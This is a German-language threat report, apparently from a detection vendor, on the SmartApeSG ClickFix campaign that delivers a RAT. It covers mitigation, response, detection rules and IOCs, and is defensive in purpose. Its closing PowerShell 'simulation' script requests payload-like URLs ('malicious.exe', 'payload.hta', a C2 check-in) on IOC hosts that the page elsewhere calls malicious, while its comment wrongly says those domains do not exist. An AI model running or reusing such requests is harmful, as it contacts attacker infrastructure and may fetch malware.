SmartApeSG verbreitet einen unbekannten RAT über ClickFix-Köder
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Die SmartApeSG-Kampagne verwendet die ClickFix-Technik, um Benutzer zu täuschen, bösartige Befehle durch gefälschte CAPTCHA- oder menschliche Verifizierungsseiten auszuführen. Diese Aktion startet eine HTA-Datei, die ein bösartiges ZIP-Archiv herunterlädt und extrahiert. Die endgültige Nutzlast ist ein nicht identifizierter Remote Access Trojan (RAT), der auf DLL-Side-Loading angewiesen ist, um Persistenz aufzubauen und mit seiner C2-Infrastruktur zu kommunizieren.
Untersuchung
Die Untersuchung umfasste die Analyse des HTTPS-Verkehrs, PCAP-Dateien und bösartiger Archive, die mit der SmartApeSG-Aktivität in Verbindung stehen. Forscher identifizierten bösartigen JavaScript-Code, der in legitime Websites injiziert wurde, und verfolgten die Infektionskette von einem in die Zwischenablage injizierten Befehl bis zur endgültigen C2-Verbindung. Es wurde beobachtet, dass der RAT mit einer externen IP-Adresse über Port 443 mit verschlüsseltem Datenverkehr kommuniziert.
Abschwächung
Organisationen sollten Webfilterung verwenden, um bekannte bösartige Domains zu blockieren, einschließlich pewtercanto[.]top and deltaode[.]com. Benutzer sollten darin geschult werden, Social-Engineering-Methoden wie gefälschte CAPTCHAs und ClickFix-Anweisungen zu erkennen. Die Ausführung von HTA-Dateien einzuschränken und auf verdächtige Kindprozesse zu überwachen, die von Browsern oder Run-Befehlen gestartet werden, kann das Risiko weiter reduzieren.
Reaktion
Wird eine SmartApeSG-Aktivität festgestellt, sollte der betroffene Endpunkt sofort isoliert werden, um die C2-Kommunikation zu unterbrechen. Ermittler sollten die Verzeichnisse AppData und Dokumente untersuchen, um den RAT und seine Persistenzmechanismen zu identifizieren. Auch sollten Endpunkt-Telemetriedaten auf unerlaubte HTA-Ausführung, Zwischenablagenmanipulation und DLL-Side-Loading-Aktivitäten überprüft werden.
Angriffsablauf
Erkennungen
Verdächtige Kommando- und Kontrollanfragen durch ungewöhnliche Top Level Domain (TLD) DNS-Anfrage (via dns)
Proof of Value
Verdächtige Umgebungsvariablen (via cmdline)
Proof of Value
Verdächtige Mshta-Ausführung ohne HTA-Datei (via cmdline)
Proof of Value
Ungewöhnliche Top Level Domain in der Befehlszeile (via cmdline)
Proof of Value
IOCs (HashSha256) zur Erkennung: SmartApeSG ClickFix Kampagne treibt nicht identifizierten RAT
Proof of Value
IOCs (SourceIP) zur Erkennung: SmartApeSG ClickFix Kampagne treibt nicht identifizierten RAT
Proof of Value
IOCs (DestinationIP) zur Erkennung: SmartApeSG ClickFix Kampagne treibt nicht identifizierten RAT
Proof of Value
SmartApeSG ClickFix Kampagne RAT Aktivität [Windows Netzwerkverbindung]
Proof of Value
Erkennung eines nicht identifizierten RATs via DLL-Side-Loading durch SmartApeSG-Kampagne [Windows Datei-Ereignis]
Proof of Value
Simulationsausführung
Voraussetzung: Die Telemetrie & Vorab-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und der Erzähltext MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu einer Fehldiagnose.
-
Angriffserzählung & Befehle: Der Gegner führt die SmartApeSG ClickFix-Kampagne aus. Nachdem ein Benutzer zu einer bösartigen Handlung verleitet wurde (oftmals ein gefälschtes Browser-Update), versucht das System, eine bösartige HTA-Datei herunterzuladen. Diese HTA initiiert dann eine Verbindung zur C2-Infrastruktur, um die endgültige RAT-Nutzlast herunterzuladen. Zur Simulation werden wir Netzwerk-Anfragen erzeugen, die die genauen im Erkennungslogik definierten Zeichenfolgen treffen:
deltaode.compo,deltaode.com/wv, und die IP89.124.79.98. -
Regressionstest-Skript:
# Simulationsskript zur Auslösung der SmartApeSG-Erkennungsregel # Dieses Skript simuliert die Netzwerk-Anfragen zu den spezifischen IoCs $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "Simuliere Anfrage an: $url" try { # Verwendung von Invoke-WebRequest zur Erzeugung der Netzwerk-Telemetrie # Wir verwenden -ErrorAction SilentlyContinue, da diese Domains tatsächlich nicht existieren Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "Anfrage fehlgeschlagen (erwartet), aber Telemetrie sollte erzeugt werden." } } -
Bereinigungskommandos:
# Es wurden keine dauerhaften Änderungen am System vorgenommen; keine Bereinigung erforderlich. Write-Host "Simulation abgeschlossen. Keine Artefakte auf dem System hinterlassen."